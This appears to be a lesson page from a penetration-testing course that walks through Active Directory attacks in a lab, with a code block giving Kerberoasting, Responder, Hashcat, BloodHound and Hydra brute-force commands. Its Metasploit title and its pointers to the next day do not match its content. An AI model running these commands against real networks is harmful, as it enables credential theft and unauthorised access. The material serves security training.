Day 3: Exploitation with Metasploit

Today's Objective

Metasploit modules, payloads, and the post-exploitation sequence — from initial access to privilege escalation to lateral movement in a legal lab environment.

Active Directory Attacks

Active Directory (AD) is the backbone of Windows enterprise networks. Common attacks: AS-REP Roasting (Kerberos pre-auth disabled), Kerberoasting (cracking service ticket hashes), Pass-the-Hash (reusing NTLM credential hashes), and BloodHound (visualizing AD attack paths). Impacket is a Python library with tools for all of these.

Man-in-the-Middle with Responder

Responder poisons LLMNR, NBT-NS, and MDNS requests on a LAN, causing Windows hosts to send you their NetNTLMv2 hashes automatically. Combined with Hashcat, you can crack weak passwords and use them for lateral movement. This attack works passively — just run Responder and wait for victims to misconfigure their name resolution.

Password Attacks

Dictionary attacks use wordlists (rockyou.txt has 14M passwords). Rule-based attacks apply transformations (append numbers, capitalize first letter). Hashcat supports GPU acceleration — an RTX 3080 cracks 40+ billion MD5 hashes per second. Hydra and Medusa brute-force network services: SSH, RDP, SMB, FTP, web login forms.

bash

# Kerberoasting with Impacket
GetUserSPNs.py -request -dc-ip 192.168.1.10 DOMAIN/user:password

# Crack Kerberos ticket with Hashcat
hashcat -m 13100 krb5tgs.hash /usr/share/wordlists/rockyou.txt

# Responder on LAN interface
responder -I eth0 -rdwv

# Crack captured NTLMv2 hashes
hashcat -m 5600 ntlmv2.hash /usr/share/wordlists/rockyou.txt

# BloodHound data collection
SharpHound.exe -c All
# Then import .zip into BloodHound GUI

# Hydra SSH brute-force
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  ssh://192.168.1.100

💡

Run Responder only during business hours when users are actively browsing — you need live systems making name resolution requests. Passive hash capture requires victim activity.

📝 Day 3 Exercise

Kerberoast a Lab AD Environment

Set up a Windows Server 2019 evaluation VM and configure Active Directory
Create 2 service accounts with SPNs (setspn -A http/svc01 domain\svcaccount)
Run GetUserSPNs.py to request and capture service tickets
Crack the tickets with Hashcat using rockyou.txt wordlist
Map the attack path in BloodHound using SharpHound data collection

Day 3 Summary

Active Directory attacks: Kerberoasting, Pass-the-Hash, BloodHound paths
Responder captures NTLMv2 hashes passively from misconfigured Windows hosts
Hashcat with GPU acceleration cracks most weak passwords quickly
Impacket provides Python-based tools for all major AD attacks
BloodHound visualizes privilege escalation paths through AD

Challenge

Set up a two-machine AD lab (DC + workstation) and complete a full kill chain: Responder hash capture → Hashcat crack → SMB login → BloodHound enumeration → escalate to Domain Admin.

← Previous

Day 2: Web Application Testing

Day 4: Advanced Tools & Evasion

→

What's Next

The foundations from today carry directly into Day 4. In the next session the focus shifts to Web Application Penetration Testing — building directly on everything covered here.

Supporting Videos & Reading

Go deeper with these external references.

YouTube

Exploitation with Metasploit — Video Walkthroughs Community tutorials and walkthroughs covering the concepts in this lesson.

→

YouTube

Exploitation with Metasploit Explained Deep-dive explanations and live-coding sessions from top educators.

→

Official Docs

Official Documentation Primary reference documentation for the technologies covered in this lesson.

→

GitHub

Open Source Examples Real-world codebases demonstrating the patterns taught in this lesson.

→

Day 3 Checkpoint

Before moving on, verify you can answer these without looking:

What is the core concept introduced in this lesson, and why does it matter?
What are the two or three most common mistakes practitioners make with this topic?
Can you explain the key code pattern from this lesson to a colleague in plain language?
What would break first if you skipped the safeguards or best practices described here?
How does today's topic connect to what comes in Day 4?

Live Bootcamp

Learn this in person — 2 days, 5 cities

Thu–Fri sessions in Denver, Los Angeles, New York, Chicago, and Dallas. $1,490 per seat. June–October 2026.

Reserve Your Seat →

Continue To Day 4

Day 4: Advanced Tools & Evasion

→